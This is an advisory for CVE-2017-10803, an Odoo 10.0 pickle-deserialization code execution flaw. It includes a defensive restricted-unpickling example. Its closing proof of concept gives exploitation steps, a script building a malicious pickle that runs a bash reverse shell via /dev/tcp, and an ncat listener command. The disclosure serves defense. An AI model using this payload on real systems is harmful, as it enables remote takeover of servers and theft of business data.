| Title | Published | Views | Family |
|---|---|---|---|
| Database Anonymization Arbitrary Code Execution Vulnerability in Multiple Odoo Products | 5 Jul 2017 00:00 | – | cnvd |
| CVE-2017-10803 | 4 Jul 2017 18:00 | – | cve |
| CVE-2017-10803 | 4 Jul 2017 18:00 | – | cvelist |
| CVE-2017-10803 | 4 Jul 2017 18:00 | – | debiancve |
| EUVD-2017-2447 | 7 Oct 2025 00:30 | – | euvd |
| Odoo CRM 10.0 - Code Execution | 30 Jun 2017 00:00 | – | exploitpack |
| CVE-2017-10803 | 4 Jul 2017 18:29 | – | nvd |
| Code injection | 4 Jul 2017 18:29 | – | prion |
## Vulnerability Summary
The following advisory describes an arbitrary Python code execution vulnerability found in Odoo CRM version 10.0.
Odoo is a suite of open source business apps that cover all your company needs: CRM, eCommerce, accounting, inventory, point of sale, project management, etc. Odoo’s unique value proposition is to be at the same time very easy to use and fully integrated.
## Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
## Vendor response
Odoo has done a private disclosure for the issue we reported, and the patch was merged in all supported branches.
CVE: CVE-2017-10803
The full public disclosure will be available at https://github.com/odoo/odoo/issues/17898.
## Vulnerability Details
One of the core Odoo modules, Database Anonymization, allows an administrator to anonymize the contents of the Odoo database. The module does this by serializing the contents of the existing database using Python’s pickle module into a backup file before modifying the contents of the database. The administrator can then de-anonymize the database by loading the pickled backup file.
Python’s pickle module can be made to execute arbitrary Python code when loading an attacker-controlled pickle file. As a result, an administrator can execute arbitrary Python code with the same privilege level as the Odoo web application by anonymizing the database and then attempting the de-anonymization process with a crafted pickle file.
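The root cause described above is that `pickle.load()` resolves and calls whatever global the stream names. The example below is added here as a defensive counterpart and is not Odoo's code or the advisory's: it scans the opcode stream for every global a backup would import without executing anything, then loads it through an `Unpickler` whose `find_class()` only resolves an allowlist of plain data types. The allowlist, the record layout of the sample backup, and the `UntrustedPayload` class (which reuses the advisory's `__reduce__` shape with a harmless `platform.python_version` call in place of `os.system`) are constructed assumptions for illustration.

```python
"""Defensive loading of an anonymization-style pickle backup (added example, not Odoo code).

Two independent checks: a static opcode scan that lists every global the pickle
would import (nothing is executed), and a restricted Unpickler whose find_class()
only resolves an allowlist of harmless types.
"""
import datetime
import io
import pickle
import pickletools
import platform

# Assumed allowlist: a data backup should only need containers, scalars and dates.
# Any other global (os.system, subprocess.*, ...) is refused before it is resolved.
ALLOWED_GLOBALS = {
    ("builtins", "dict"), ("builtins", "list"), ("builtins", "tuple"),
    ("builtins", "set"), ("builtins", "frozenset"), ("builtins", "str"),
    ("builtins", "bytes"), ("builtins", "int"), ("builtins", "float"),
    ("builtins", "bool"), ("datetime", "datetime"), ("datetime", "date"),
}


def referenced_globals(data):
    """Return {(module, name), ...} for every GLOBAL / STACK_GLOBAL opcode in `data`.

    pickletools.genops only parses the opcode stream, so an attacker-controlled
    payload is never executed during this scan. STACK_GLOBAL (protocol 4+) takes
    module and name from the two string pushes that precede it; this simplified
    tracker does not follow memo lookups, so RestrictedUnpickler stays the
    authoritative check.
    """
    found = set()
    recent_strings = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":                    # arg is "module name"
            module, name = arg.split(" ", 1)
            found.add((module, name))
        elif opcode.name == "STACK_GLOBAL":            # module/name were pushed just before
            found.add((recent_strings[-2], recent_strings[-1]))
        elif isinstance(arg, str):
            recent_strings.append(arg)
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global outside ALLOWED_GLOBALS."""

    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"refusing to resolve global {module}.{name}")
        return super().find_class(module, name)


def safe_loads(data):
    """Load an untrusted pickle: static scan first, then restricted unpickling."""
    disallowed = referenced_globals(data) - ALLOWED_GLOBALS
    if disallowed:
        raise pickle.UnpicklingError(f"disallowed globals in backup: {sorted(disallowed)}")
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data):
    """True if safe_loads refuses `data`."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


def build_benign_backup():
    """Constructed stand-in for an anonymization backup: plain records only."""
    records = [
        {"model": "res.partner", "field": "name", "id": 1,
         "value": "Example Customer", "date": datetime.date(2017, 7, 4)},
        {"model": "res.partner", "field": "email", "id": 1,
         "value": "customer@example.com", "date": datetime.date(2017, 7, 4)},
    ]
    return pickle.dumps(records, protocol=3)  # protocol 3 emits the GLOBAL opcode for datetime.date


class UntrustedPayload:
    """Same __reduce__ shape as the advisory's PoC, with a harmless callable instead of os.system."""

    def __reduce__(self):
        return (platform.python_version, ())


def build_hostile_payload():
    """Constructed hostile backup; HIGHEST_PROTOCOL emits STACK_GLOBAL instead of GLOBAL."""
    return pickle.dumps(UntrustedPayload(), protocol=pickle.HIGHEST_PROTOCOL)


def main():
    benign, hostile = build_benign_backup(), build_hostile_payload()
    print("benign globals  :", sorted(referenced_globals(benign)))
    print("hostile globals :", sorted(referenced_globals(hostile)))
    print("benign loads    :", safe_loads(benign)[0]["value"])
    print("hostile rejected:", is_rejected(hostile))


if __name__ == "__main__":
    main()
```

The scan gives a cheap pre-load triage (and a log line worth alerting on when a backup references anything beyond data types), while `find_class()` is the enforcement point: the refusal happens when the stream tries to resolve the callable, before the `REDUCE` opcode that would invoke it.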
## Proof of Concept
In order to exploit the vulnerability, you should navigate to the Apps page (the link is in the navigation bar at the top) and search for and install “Database Anonymization”. The “Apps” filter in the search bar has to be deselected for the module to show up.
Once the module is installed, we navigate to the Settings page, select “Anonymize database” under “Database anonymization” and click the “Anonymize Database” button. Next, we refresh the page and navigate to the same page under Settings. We upload the “exploit.pickle” file generated by our script and click the “Reverse the Database Anonymization” button. We should then have a reverse shell.
The following Python (2) script generates a malicious pickle file that attempts (via bash) to connect back to a listener on port 8000:
```
import cPickle
import os


class Exploit(object):
    # pickle calls __reduce__ on dump and replays the returned
    # (callable, args) pair on load, so loading this file runs os.system()
    def __reduce__(self):
        return (os.system, ("bash -i >& /dev/tcp/127.0.0.1/8000 0>&1",))


with open("exploit.pickle", "wb") as f:
    cPickle.dump(Exploit(), f, cPickle.HIGHEST_PROTOCOL)
```
We then start a netcat listener on port 8000:
```
ncat -nlvp 8000
```